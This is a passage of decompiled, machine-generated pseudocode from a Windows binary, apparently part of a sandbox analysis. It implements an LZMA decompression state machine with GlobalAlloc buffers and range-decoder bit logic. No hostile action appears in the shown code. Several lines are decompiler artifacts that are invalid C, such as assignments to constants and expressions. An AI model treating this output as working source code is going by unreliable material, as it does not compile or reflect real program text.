						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
